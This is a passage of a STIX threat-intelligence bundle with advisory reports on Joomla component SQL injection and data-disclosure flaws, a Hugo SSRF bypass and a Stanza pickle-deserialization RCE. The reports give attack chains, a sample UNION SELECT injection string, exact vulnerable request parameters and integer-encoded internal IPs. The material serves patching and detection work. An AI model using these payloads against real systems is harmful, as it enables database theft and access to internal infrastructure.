      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d9b3d0b9-ba20-5890-9582-aee38bc03139",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2019-25759: Joomla! vBizz Component Authenticated SQL Injection",
      "description": "## Overview\n\nCVE-2019-25759 details an authenticated SQL injection vulnerability within Joomla! Component vBizz version 1.0.7. This flaw permits attackers with valid login credentials to execute arbitrary SQL queries against the backend database. By crafting malicious POST requests and injecting SQL commands into the `payid` parameter array within the employee management interface, threat actors can bypass input sanitization. Successful exploitation leads to the extraction of sensitive database information, including its version and names, which can then be leveraged for further attacks or data exfiltration. The vulnerability was publicly disclosed and added to the NVD on June 19, 2026, posing a risk to organizations utilizing the affected component.\n\n## Attack Chain\n\n1. An attacker obtains valid credentials for a Joomla! Component vBizz user account (e.g., via phishing, credential stuffing, or brute-force).\n2. The attacker logs into the Joomla! administration panel or a user interface with access to the vBizz component.\n3. The attacker navigates to the vulnerable employee management interface within the vBizz component (e.g., a URL path like `/index.php?option=com_vbizz\u0026view=employees`).\n4. The attacker constructs a malicious HTTP POST request targeting the endpoint responsible for handling employee data, which processes the `payid` parameter.\n5. Within the POST request body, the attacker injects SQL commands into the `payid` parameter array (e.g., `payid[]=1 UNION SELECT VERSION(), DATABASE(), NULL--`).\n6. The vulnerable vBizz component processes the POST request without properly sanitizing the input provided in the `payid` parameter.\n7. The backend database executes the injected SQL query, causing the application's HTTP response to return sensitive information, such as database version or names, embedded in the page content or error messages.\n8. The attacker parses the HTTP response to extract the sensitive database information, completing the data collection objective.\n\n## Impact\n\nSuccessful exploitation of CVE-2019-25759 allows authenticated attackers to exfiltrate sensitive database information, such as database version numbers and database names. This information can be critical for reconnaissance, enabling attackers to tailor more advanced attacks, identify other vulnerabilities, or extract confidential business data. The exposure of database schema and content could lead to regulatory compliance violations, significant data breaches, reputational damage, and financial losses for affected organizations. While the specific number of victims is not available, any organization using Joomla! Component vBizz 1.0.7 with an exposed web interface is at risk.\n\n## Recommendation\n\n*   Patch or upgrade Joomla! Component vBizz to a version higher than 1.0.7 immediately to mitigate CVE-2019-25759.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect exploitation attempts.\n*   Ensure web server logs are collected and stored for analysis to detect patterns matching the detection logic described in the Sigma rules.\n",
      "published": "2026-06-19T18:37:53Z",
      "labels": [
        "sql-injection",
        "web-application",
        "joomla"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25759"
        },
        {
          "source_name": "reference",
          "url": "http://wdmtech.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46223"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-vbizz-sql-injection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--433a2c95-6fdc-5d29-986f-86cedfd37e51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--baebb569-3276-5264-8b69-9730cb48dfaf",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f71877d2-4631-5e0d-a7ae-3d7c23aef96d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--baebb569-3276-5264-8b69-9730cb48dfaf",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3213c987-6a6f-5685-b2e7-66bb7603e19c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--baebb569-3276-5264-8b69-9730cb48dfaf",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--baebb569-3276-5264-8b69-9730cb48dfaf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla! JoomCRM Component SQL Injection (CVE-2019-25761)",
      "description": "## Overview\n\nA critical SQL injection vulnerability, tracked as CVE-2019-25761, has been identified in Joomla! Component JoomCRM version 1.1.1. This flaw permits authenticated attackers to execute arbitrary SQL queries, posing a significant risk to the confidentiality of underlying database systems. Attackers can leverage this by sending specially crafted GET requests to the `index.php` file, targeting the `deal_id` parameter within the `option=com_joomcrm\u0026view=contacts` context. Successful exploitation enables the attacker to extract sensitive information such as database table names and schemas. While this vulnerability was originally disclosed in 2019, its details have been more recently processed by NVD, emphasizing the ongoing risk for organizations still running unpatched versions of the JoomCRM component. Defenders should prioritize patching and detection given the ease of exploitation for authenticated users.\n\n## Attack Chain\n\n1.  **Initial Access / Authentication**: An attacker gains or possesses valid authentication credentials for a Joomla! instance running the JoomCRM component. This could be achieved through various means such as credential stuffing, phishing, or prior compromise.\n2.  **Targeting Vulnerable Endpoint**: The authenticated attacker constructs a malicious GET request targeting the vulnerable `index.php` file, specifically the `option=com_joomcrm\u0026view=contacts` path.\n3.  **SQL Injection Payload Crafting**: The attacker crafts an SQL injection payload to be embedded within the `deal_id` parameter of the GET request. This payload is designed to bypass application input sanitization and manipulate the backend SQL query.\n4.  **Information Gathering (Database Structure)**: The attacker injects SQL commands aimed at querying the database's metadata, such as `information_schema`, to enumerate table names and column structures.\n5.  **Information Gathering (Sensitive Data)**: Using knowledge of the database structure, the attacker modifies subsequent SQL injection payloads to extract sensitive data from specific tables, such as user credentials, customer records, or financial information.\n6.  **Data Exfiltration**: The extracted sensitive database information is returned within the HTTP response, allowing the attacker to collect and exfiltrate the data from the vulnerable Joomla! application.\n\n## Impact\n\nSuccessful exploitation of CVE-2019-25761 allows authenticated attackers to gain unauthorized access to the underlying database, leading to severe data breaches. The primary impact is the compromise of sensitive data, including customer records, proprietary business information, user authentication credentials, and potentially other confidential organizational data stored within the Joomla! database. While no specific victim count or sectors are mentioned, any organization utilizing Joomla! with the vulnerable JoomCRM 1.1.1 component is at risk. The ability to extract database schemas and sensitive data can lead to regulatory fines, reputational damage, and further targeted attacks against the organization and its customers.\n\n## Recommendation\n\n*   Immediately update Joomla! Component JoomCRM to a version that patches CVE-2019-25761, or remove the component if it is no longer needed.\n*   Deploy the provided Sigma rules to your SIEM solution to detect attempted exploitation of CVE-2019-25761 on web servers hosting Joomla! installations.\n*   Enable comprehensive web server logging, specifically capturing full GET request URIs and query parameters (`cs-uri-stem`, `cs-uri-query`), to activate the detection rules.\n*   Review and enforce strong authentication policies to mitigate the risk of attackers gaining initial authenticated access, which is a prerequisite for exploiting this vulnerability.\n",
      "published": "2026-06-19T18:39:07Z",
      "labels": [
        "sql-injection",
        "web-application",
        "data-exfiltration",
        "joomla"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25761"
        },
        {
          "source_name": "reference",
          "url": "http://joomboost.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/marketing/crm/joomcrm/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46122"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-joomcrm-sql-injection-via-deal-id"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9e10705c-cb83-5753-a8c4-ce95cd5b1d0d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c66a20f1-701e-56d9-9d4c-f8b5b863410e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--8421e466-d7ca-5323-89f1-e65b71cf62ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gather Victim Identity Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1589",
          "url": "https://attack.mitre.org/techniques/T1589"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--41208769-4e52-5112-98f8-6be778890c41",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c66a20f1-701e-56d9-9d4c-f8b5b863410e",
      "target_ref": "attack-pattern--8421e466-d7ca-5323-89f1-e65b71cf62ab"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c66a20f1-701e-56d9-9d4c-f8b5b863410e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla! Component JoomProject Information Disclosure (CVE-2019-25762)",
      "description": "## Overview\n\nCVE-2019-25762 details an information disclosure vulnerability affecting Joomla! Component JoomProject version 1.1.3.2. Unauthenticated attackers can exploit this flaw by sending a specially crafted HTTP GET request to the vulnerable Joomla! instance. The exploit involves targeting the `index.php` endpoint with specific query parameters (`option=com_jpprojects\u0026view=projects\u0026tmpl=component\u0026format=json`) to bypass authentication and directly access sensitive user data. This data, which includes user IDs, names, and email addresses, is returned in JSON format. This vulnerability is critical for organizations using the affected component, as it can lead to the mass exfiltration of Personally Identifiable Information (PII), enabling subsequent phishing, identity theft, or targeted attacks.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a vulnerable Joomla! instance running JoomProject 1.1.3.2.\n2.  The attacker sends an HTTP GET request to the Joomla! web server, targeting the `index.php` endpoint.\n3.  The request includes specific query parameters: `option=com_jpprojects\u0026view=projects\u0026tmpl=component\u0026format=json`.\n4.  The Joomla! Component JoomProject 1.1.3.2 processes this request without properly verifying user authentication or authorization.\n5.  Due to the vulnerability, the component directly queries its backend database for project and associated user details.\n6.  The component then constructs a JSON response containing sensitive user data, such as user IDs, names, and email addresses.\n7.  This JSON response is returned to the unauthenticated attacker as part of the normal HTTP response.\n8.  The attacker successfully collects and exfiltrates sensitive user PII from the affected Joomla! application.\n\n## Impact\n\nThe successful exploitation of CVE-2019-25762 results in the unauthorized disclosure of sensitive user data, including user IDs, names, and email addresses. This constitutes a high-confidentiality impact, as detailed by the CVSS 3.1 score of 7.5. Organizations whose Joomla! installations are affected risk severe reputational damage, regulatory non-compliance fines (e.g., GDPR, CCPA), and potential legal repercussions. The stolen PII can be leveraged by attackers for various follow-on malicious activities, such as targeted phishing campaigns, credential stuffing attacks, or identity theft against the affected users.\n\n## Recommendation\n\n*   Immediately patch or upgrade Joomla! Component JoomProject to a version beyond 1.1.3.2, or disable/uninstall the component if not strictly necessary, to remediate CVE-2019-25762.\n*   Deploy the Sigma rule \"Detect CVE-2019-25762 Exploitation - JoomProject Info Disclosure\" to your SIEM for real-time detection of attempted exploitation.\n*   Review web server access logs for past requests containing `index.php?option=com_jpprojects\u0026view=projects\u0026tmpl=component\u0026format=json` patterns to identify potential historical compromises.\n",
      "published": "2026-06-19T18:40:22Z",
      "labels": [
        "information-disclosure",
        "joomla",
        "web-application",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--8421e466-d7ca-5323-89f1-e65b71cf62ab"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25762"
        },
        {
          "source_name": "reference",
          "url": "http://joomboost.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/clients-a-communities/project-a-task-management/joomproject/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46121"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-joomproject-information-disclosure"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--48e553b7-c67f-59b2-b2a4-32024d0f1dc9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--34885620-62af-5f8f-b772-4a1271c9809a",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Network Configuration Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1016",
          "url": "https://attack.mitre.org/techniques/T1016"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f713d517-0da9-5c19-b341-9f90e4af9756",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--34885620-62af-5f8f-b772-4a1271c9809a",
      "target_ref": "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6b7b86a9-346d-5b18-8c55-2d4bd08889f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Cloud Infrastructure Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1580",
          "url": "https://attack.mitre.org/techniques/T1580"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--313c7605-623a-549e-809b-3f74dcae5a8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--34885620-62af-5f8f-b772-4a1271c9809a",
      "target_ref": "attack-pattern--6b7b86a9-346d-5b18-8c55-2d4bd08889f8"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--34885620-62af-5f8f-b772-4a1271c9809a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hugo security.http.urls Bypass via Alternate IPv4 Encodings (SSRF)",
      "description": "## Overview\n\nA significant Server-Side Request Forgery (SSRF) vulnerability, impacting Hugo versions 0.162.0 through 0.163.0, allows attackers to bypass the `security.http.urls` policy. This policy is intended to prevent Hugo from making requests to sensitive internal, loopback, or cloud-metadata IPv4 addresses during site generation, especially when processing untrusted URLs via `resources.GetRemote`. The bypass occurs because the denial rule only recognized IPv4 addresses in standard dotted-decimal format, failing to catch alternate encodings such as integer, hexadecimal, or octal representations. This flaw can lead to build-time server-side requests to internal infrastructure or cloud metadata endpoints when a host platform utilizes the `cgo` system resolver, enabling potential information disclosure or unauthorized internal network access during CI/CD processes or other build environments. The vulnerability was patched in Hugo v0.163.1, which canonicalizes IPv4 hosts to dotted-decimal before applying the policy.\n\n## Attack Chain\n\n1.  **Initial Access / Injection**: An attacker injects a specially crafted URL containing an alternate IPv4 encoding (e.g., `http://2130706433/` for `127.0.0.1` or `http://2852039166/` for cloud metadata) into a Hugo template or data source.\n2.  **Vulnerable Processing**: During a Hugo site build, a template attempts to fetch content from this untrusted URL using the `resources.GetRemote` function.\n3.  **Policy Bypass Attempt**: Hugo's `security.http.urls` policy is consulted to determine if the URL should be denied, but it only checks for dotted-decimal IPv4 formats.\n4.  **Encoding Misinterpretation**: Due to the vulnerability, the policy fails to recognize the integer, hexadecimal, or octal IPv4 encoding as a disallowed internal, loopback, or cloud-metadata address.\n5.  **DNS/Resolver Resolution**: The host platform's `cgo` system resolver resolves the alternate IPv4 encoding (e.g., `2130706433`) to its standard dotted-decimal equivalent (`127.0.0.1`).\n6.  **Internal Request Execution**: Hugo proceeds to make an outbound HTTP GET request to the now-resolved internal IP address (e.g., `127.0.0.1`, `169.254.169.254`, or another internal service).\n7.  **Information Disclosure/Internal Access**: The build environment's internal services or cloud metadata endpoint respond to Hugo's request, potentially disclosing sensitive configuration data, credentials, or allowing access to internal resources that should have been protected.\n\n## Impact\n\nThe primary impact of this vulnerability is the potential for Server-Side Request Forgery (SSRF) during the Hugo site build process. If exploited, an attacker can coerce the build server to make outbound HTTP requests to arbitrary internal network resources, including loopback addresses, internal hosts, or cloud metadata endpoints (e.g., `169.254.169.254`). This can lead to the exposure of sensitive information such as cloud instance credentials, internal network topology, or other confidential data accessible from the build environment. While no specific victim counts or sectors were noted, organizations using Hugo in CI/CD pipelines or environments where untrusted content influences builds are at risk of unauthorized data access and potential lateral movement within their internal infrastructure.\n\n## Recommendation\n\n*   Upgrade Hugo to version **v0.163.1** or newer immediately to apply the patch that correctly canonicalizes IPv4 addresses.\n*   Review CI/CD pipeline configurations and Hugo site templates to avoid passing untrusted or data-derived URLs directly to `resources.GetRemote`.\n*   Harden `security.http.urls` in Hugo configurations to implement an explicit allow-list of trusted hosts for `resources.GetRemote` calls.\n*   Deploy the provided Sigma rules to detect unexpected outbound network connections from build servers and similar environments.\n*   Ensure network connection logging is enabled on build servers and developer workstations to capture attempts to access internal or cloud metadata IPs.\n",
      "published": "2026-06-19T19:22:40Z",
      "labels": [
        "ssrf",
        "vulnerability",
        "hugo",
        "build-time",
        "webserver"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c",
        "attack-pattern--6b7b86a9-346d-5b18-8c55-2d4bd08889f8"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-r46f-3rpw-hxrv"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--8421e466-d7ca-5323-89f1-e65b71cf62ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gather Victim Identity Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1589",
          "url": "https://attack.mitre.org/techniques/T1589"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ba88681c-6cfa-50cf-8c29-146c7524b1c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--082c7c20-8b7c-596c-89b8-0dad0c8606bd",
      "target_ref": "attack-pattern--8421e466-d7ca-5323-89f1-e65b71cf62ab"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gather Victim Host Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1592",
          "url": "https://attack.mitre.org/techniques/T1592"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5f2d2fcd-7224-5b01-8b52-f0dddaf557f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--082c7c20-8b7c-596c-89b8-0dad0c8606bd",
      "target_ref": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--082c7c20-8b7c-596c-89b8-0dad0c8606bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla com_booking Information Disclosure (CVE-2023-54357)",
      "description": "## Overview\n\nCVE-2023-54357 is an information disclosure vulnerability affecting version 2.4.9 of the Joomla com_booking component. Unauthenticated attackers can exploit this flaw to enumerate sensitive user account information, including names, usernames, and email addresses. The vulnerability resides within the `getUserData` function of the `customer` controller, allowing an attacker to send specially crafted HTTP GET requests to `index.php` with specific parameters (`option=com_booking`, `controller=customer`, `task=getUserData`, and an `id`). By brute-forcing the `id` parameter, an adversary can systematically collect a list of valid user accounts on the affected Joomla instance. This exposure of user data can facilitate further attacks such as credential stuffing, phishing, or targeted social engineering, making it a significant concern for organizations using the vulnerable component.\n\n## Attack Chain\n\n1.  **Reconnaissance**: An unauthenticated attacker identifies a Joomla web application running the vulnerable `com_booking` component, version 2.4.9.\n2.  **Vulnerability Probing**: The attacker constructs an HTTP GET request targeting the `index.php` endpoint of the Joomla application.\n3.  **Parameter Injection**: The GET request includes the parameters `option=com_booking`, `controller=customer`, `task=getUserData`, and an `id` parameter (e.g., `id=1`).\n4.  **Information Retrieval**: The vulnerable `getUserData` function processes the request and, for valid `id` values, returns JSON or XML data containing the corresponding user's name, username, and email address.\n5.  **Brute-Force Enumeration**: The attacker repeatedly sends GET requests, systematically incrementing or varying the `id` parameter to enumerate multiple user accounts present on the system.\n6.  **Data Collection**: The attacker collects the exposed user data, including names, usernames, and email addresses, for all successfully enumerated accounts.\n7.  **Subsequent Attack Preparation**: The collected information is then used as a basis for further malicious activities, such as credential stuffing attacks against other services, targeted phishing campaigns, or social engineering schemes.\n\n## Impact\n\nThe primary impact of CVE-2023-54357 is the unauthorized disclosure of sensitive user information. If exploited, an attacker gains access to a list of registered user names, their associated usernames, and email addresses. This data can be leveraged for various follow-on attacks, including credential stuffing against other services if users reuse passwords, highly effective spear-phishing campaigns tailored to the enumerated individuals, or general social engineering attacks. While the vulnerability itself does not grant direct access to the system or modify data, the leaked information significantly lowers the bar for attackers to compromise user accounts or target individuals within the organization, leading to potential data breaches, financial loss, or reputational damage.\n\n## Recommendation\n\n*   **Patch CVE-2023-54357**: Immediately upgrade the Joomla `com_booking` component to a version higher than 2.4.9 to remediate CVE-2023-54357.\n*   **Deploy Sigma Rule**: Deploy the `Detect Joomla com_booking Information Disclosure (CVE-2023-54357)` Sigma rule provided in this brief to your SIEM for real-time detection of exploitation attempts.\n*   **Monitor Web Server Logs**: Configure and actively monitor web server access logs for unusual patterns involving GET requests to `index.php` with `option=com_booking`, `controller=customer`, `task=getUserData`, and an `id` parameter.\n",
      "published": "2026-06-19T19:23:43Z",
      "labels": [
        "joomla",
        "web-vulnerability",
        "information-disclosure",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--8421e466-d7ca-5323-89f1-e65b71cf62ab",
        "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-54357"
        },
        {
          "source_name": "reference",
          "url": "http://www.artio.net/"
        },
        {
          "source_name": "reference",
          "url": "http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/51595"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-com-booking-information-disclosure-via-account-enumeration"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Supply Chain Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1195",
          "url": "https://attack.mitre.org/techniques/T1195"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5c855d20-484e-5728-88ab-1eff2efa14e6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--16b324dd-8e4a-5c01-82e8-82ea2989ade3",
      "target_ref": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--993a362c-bd40-58ca-9722-53a870b11274",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--16b324dd-8e4a-5c01-82e8-82ea2989ade3",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--16b324dd-8e4a-5c01-82e8-82ea2989ade3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Stanza: Remote Code Execution via Unsafe Pickle Deserialization in Model Loaders",
      "description": "## Overview\n\nThe Stanza Natural Language Processing (NLP) library, specifically version 1.12.0 and earlier, is susceptible to an arbitrary code execution vulnerability (CVE-2026-54499) stemming from unsafe deserialization. When attempting to load PyTorch checkpoint files, Stanza's `torch.load` implementation initially uses a `weights_only=True` flag for safety. However, if this safe load raises a `pickle.UnpicklingError` (a condition controllable by an attacker via a specially crafted `.pt` file containing an unsupported pickle global), Stanza immediately falls back to reloading the *same attacker-controlled file* with `weights_only=False`. This completely bypasses PyTorch's safety mechanisms, invoking Python's full pickle deserializer, which can execute any `__reduce__` method embedded in the malicious file. The vulnerability affects any user, researcher, or NLP service loading Stanza models from untrusted or compromised sources, enabling full system compromise.\n\n## Attack Chain\n\n1.  **Attacker Crafts Malicious Model**: An attacker prepares a malicious PyTorch `.pt` file, embedding arbitrary Python code in its `__reduce__` method and including at least one unsupported pickle global to force an `UnpicklingError` during safe loading.\n2.  **Model Placement/Distribution**: The attacker places this malicious `.pt` file on a system or repository where it can be loaded by a victim (e.g., via supply-chain compromise of a model repository like HuggingFace, poisoning a shared model cache, or distributing it through third-party fine-tuning hubs).\n3.  **Victim Initiates Model Load**: A victim's application, CI/CD pipeline, or research environment uses the Stanza API (`stanza.Pipeline()`, `load_pretrain()`) to load a pretrain or model file, unknowingly targeting the malicious `.pt` file.\n4.  **Initial Safe Load Attempt**: Stanza's internal `Pretrain.load()` function attempts to load the `.pt` file using `torch.load(..., weights_only=True)`.\n5.  **UnpicklingError Triggered**: Due to the attacker-controlled unsupported pickle global, PyTorch raises a `pickle.UnpicklingError` as intended by its `weights_only=True` safety feature.\n6.  **Unsafe Fallback Invoked**: Stanza's vulnerable `try...except` block catches the `UnpicklingError` and immediately reloads the *same malicious file* using `torch.load(..., weights_only=False)`.\n7.  **Arbitrary Code Execution**: Python's full pickle deserializer executes the attacker's arbitrary code embedded within the malicious `.pt` file's `__reduce__` method, with the privileges of the Stanza process.\n8.  **Impact Achieved**: The attacker's payload executes, leading to consequences such as credential theft (HuggingFace tokens, cloud IAM keys), installation of persistent backdoors, data exfiltration, or lateral movement within the victim's infrastructure.\n\n## 